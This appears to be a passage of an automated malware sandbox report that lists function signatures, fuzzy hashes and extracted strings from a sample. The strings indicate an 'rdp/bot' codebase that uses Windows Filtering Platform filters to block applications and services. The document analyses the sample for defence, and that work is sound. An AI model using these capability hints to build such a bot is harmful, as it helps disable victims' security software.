7ff73afb9243-7ff73afb9248 688->694 695 7ff73afb916b-7ff73afb9171 688->695 689->636 696 7ff73afb9225-7ff73afb922a 690->696 697 7ff73afb9139-7ff73afb913e 690->697 691->636 692->636 693->636 694->636 698 7ff73afb9177-7ff73afb917c 695->698 699 7ff73afb924d-7ff73afb9252 695->699 696->636 697->636 698->636 699->636
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
    • API String ID: 493744553-3317923414
    • Opcode ID: 14e55ba5be5b0934ddbeb236a4762f3caeeab83ccb12abe0d60990accc268619
    • Instruction ID: 80b2dd1a26a6001f9ce48cbdcd20045eb0c37ffcce0df327dfb069deb25c8eaf
    • Opcode Fuzzy Hash: 14e55ba5be5b0934ddbeb236a4762f3caeeab83ccb12abe0d60990accc268619
    • Instruction Fuzzy Hash: 9F51583A608BC396F770AB51E4853AAB7A0FB84744F804135CA8D43B99EF3DD549DB50

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
    • API String ID: 1004003707-3780280517
    • Opcode ID: 7b79c66cf7543f52e94a0675e37f9e0ed33c8fbc5481e15fb2d10330909dd249
    • Instruction ID: 7b5076733cf88c5ef68b772245d87cdecff6d71a7336ba55c5d1765b0ebd46b7
    • Opcode Fuzzy Hash: 7b79c66cf7543f52e94a0675e37f9e0ed33c8fbc5481e15fb2d10330909dd249
    • Instruction Fuzzy Hash: 8D41496AA0C747B1FB24AB42E8823F5E360BF04348FD444B2DA8D06595DF7CE546E320

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
    • API String ID: 1004003707-386092548
    • Opcode ID: 548dea3bc508dc1a0a84fd39489bf308a69981cbc3a6351056bba2097c9e8e34
    • Instruction ID: 3c116e9d81ea8578d464b38d67f08590e9a174dcc4c1662dea5b0a128108ca0d
    • Opcode Fuzzy Hash: 548dea3bc508dc1a0a84fd39489bf308a69981cbc3a6351056bba2097c9e8e34
    • Instruction Fuzzy Hash: 13413DA9A48747B1FB24BB41E8827B5E360BF44348FD444B6DA8E06591DF7CE945E320

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: _errno
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
    • API String ID: 2918714741-1670302297
    • Opcode ID: 1e820ce9e0270d6dd596d4ce3fc3434279229fe4d377697206069097b08eda33
    • Instruction ID: f991a78227f3791d6947ccf80ac99e26ecfdc6615ec4e4c0f870fb2ef25a014a
    • Opcode Fuzzy Hash: 1e820ce9e0270d6dd596d4ce3fc3434279229fe4d377697206069097b08eda33
    • Instruction Fuzzy Hash: 83219426A08747A6F761BF15E8417AAB760BB44784F844175EE4C47664CF3CD845EB20

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1
    • API String ID: 513531256-1839485796
    • Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
    • Instruction ID: ab0eebbc853dbf910e2e401bf66b83efa164bbf0a9d49ce620be0a88b89eabd7
    • Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
    • Instruction Fuzzy Hash: AC417139A4C64366F320BB12E8563BAA261FB84780FC00571DA8E87795CF3DE585E764

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: DestroyEnumFwpmHandle0Providerwcscmp
    • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
    • API String ID: 1522850966-2029202777
    • Opcode ID: aab0fea549d9df8105a3d834c2b87f957c090dd48653e7cde641d3d98ee23738
    • Instruction ID: 12b203eef627eb7880a6640fa22b56aa77636c4aebd9c5e3a2b77771b77e74e3
    • Opcode Fuzzy Hash: aab0fea549d9df8105a3d834c2b87f957c090dd48653e7cde641d3d98ee23738
    • Instruction Fuzzy Hash: EB51D27A619B82A1F720AB06F4413BAB3A6FB85780F908131DA8D47B59EF3DD440D790
    APIs
    • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,0000021A43F414C0,?,00007FF73AFB14B4,?,?,00000001,00007FF73AFB14D2), ref: 00007FF73AFB9701
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Close0EngineFwpmwcscmp
    • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
    • API String ID: 4239307310-774261742
    • Opcode ID: d2d43abc452dc9fe129a4f954752cb9f405ffece9e41e5ca64cb32e5105c3a81
    • Instruction ID: 27e9098c141fcfd17c434e9c25183ece0ddc3e9fec995472fb6efe27600901e4
    • Opcode Fuzzy Hash: d2d43abc452dc9fe129a4f954752cb9f405ffece9e41e5ca64cb32e5105c3a81
    • Instruction Fuzzy Hash: 5C31B259B1C74361FB10B625A4D23BA93B29F493C0FD000B1EE5E8B796EF5CD845A360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
    • API String ID: 1799206407-4111913120
    • Opcode ID: 02e64e14d494d3f65462d1fb93bbe797074388c3a4891e73fb0e54cb95491db1
    • Instruction ID: c7453aee61f638d82efd63e58905ceacdc5df61eae8fd65301e2e8f14f340475
    • Opcode Fuzzy Hash: 02e64e14d494d3f65462d1fb93bbe797074388c3a4891e73fb0e54cb95491db1
    • Instruction Fuzzy Hash: E021DC5CE0CA43E2FFB4B654D4863B9E1605F0470AFE849B2D14ECA6D8DD3CE8957262
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: 42f4296048a737d70f70c93d8203d6fe83a73460765471b65387b053bb5cc819
    • Instruction ID: d76c56d9bf95e5c24189cdbf1ac559e11c6bacc6572600a5b9512559f9b6e1e7
    • Opcode Fuzzy Hash: 42f4296048a737d70f70c93d8203d6fe83a73460765471b65387b053bb5cc819
    • Instruction Fuzzy Hash: B6F0F999A08703E2FA25B746B8021F5E261AF44BC0FC44871CC8D077A9EE2CE942E320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastNextProcess32
    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
    • API String ID: 1692733154-1215713629
    • Opcode ID: b44767d0eb3903c0577117750b57d4e322fa12025d9475b1dc90b9167d3c19cd
    • Instruction ID: 7a2267549846657d7a33c71fe8394b3a31274f86df751695e8dd5198c8465423
    • Opcode Fuzzy Hash: b44767d0eb3903c0577117750b57d4e322fa12025d9475b1dc90b9167d3c19cd
    • Instruction Fuzzy Hash: E2F0625EA0C703B1FB24772998871789361AF85785FC048B1C48E46295DE2CE944B364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastNextProcess32
    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
    • API String ID: 1692733154-1215713629
    • Opcode ID: 62b4acebcf41ecdac732218a6022ab69ae6f7fd734c812b916a32559b19b63b8
    • Instruction ID: 182b2ef06c6abd2a575bca89679421a255c2748cfbd4ab9d4ca1beae8047f18d
    • Opcode Fuzzy Hash: 62b4acebcf41ecdac732218a6022ab69ae6f7fd734c812b916a32559b19b63b8
    • Instruction Fuzzy Hash: CEF06D5EA0C703B5FA24772A988717893A2AF85785FC048B1C44E87295EF2CE940B364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastNextProcess32
    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
    • API String ID: 1692733154-1215713629
    • Opcode ID: 08da8ff119f0a172ae04cd7a6a090ebeaaac8c8e9af8dbde6019bdc214b8db16
    • Instruction ID: b366cb0933c5b61a2b827b40a0ff4c8b94190a8046d7859fe01f439fb9c652c0
    • Opcode Fuzzy Hash: 08da8ff119f0a172ae04cd7a6a090ebeaaac8c8e9af8dbde6019bdc214b8db16
    • Instruction Fuzzy Hash: 16F06D5EA0C703B1FA24772A988717893A2AF85785FC048B2C44E87295DF2CE940B364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastNextProcess32
    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
    • API String ID: 1692733154-1215713629
    • Opcode ID: 3a8c6bc5d49cd7fafb2d764050da16aef980dc09c4d0716478ceca3d84447444
    • Instruction ID: c1c7509ea7b1a16292a272f6124e2d806e54788cd201210257e698ef7d34c5c3
    • Opcode Fuzzy Hash: 3a8c6bc5d49cd7fafb2d764050da16aef980dc09c4d0716478ceca3d84447444
    • Instruction Fuzzy Hash: F7F06D5EA0C703B1FA24772A988717893A2AF85785FC048B2C44E87295DF2CE940B364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: 35a97eff837c662eb1cd0d64952b0cb7041c3edb4cdd17053a38ed6f3b84e1be
    • Instruction ID: a65d1a5530c73171946b447c2c0e218e211aedea9ea97b1f32184edaa36d93e6
    • Opcode Fuzzy Hash: 35a97eff837c662eb1cd0d64952b0cb7041c3edb4cdd17053a38ed6f3b84e1be
    • Instruction Fuzzy Hash: B5F05E1CE0AB07A1F969BB57E8425F49260AF1DB94BC819B1CC4E17762ED2CE585A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
    • Instruction ID: c2adb0843ecf5f2e7aa9c09abe668fbf21adaeda694f2383d2b7a87097ce4279
    • Opcode Fuzzy Hash: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
    • Instruction Fuzzy Hash: 42F0891BB08703A1F966BA05B5427B9D2611F917A6EC946B58E5C0B7C1ED3DD883A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
    • Instruction ID: 07523cd7b246b06516d9fde137f5512024a059e274d7aefd57b876658a23df44
    • Opcode Fuzzy Hash: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
    • Instruction Fuzzy Hash: A4F0891BB08703A1F966BA05B5427B9D2612F917A2EC945B58E5C0B7C1DD3DD883A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
    • Instruction ID: bc301c86fa634eb69e62cedba2ebb7a80ff8b286bc8d778d070b1e5505b098cd
    • Opcode Fuzzy Hash: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
    • Instruction Fuzzy Hash: 3BF0891BB08703A1F966BA05B5427B9D2611F917A6EC945B5CE5C0B7C1DE3DE883A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
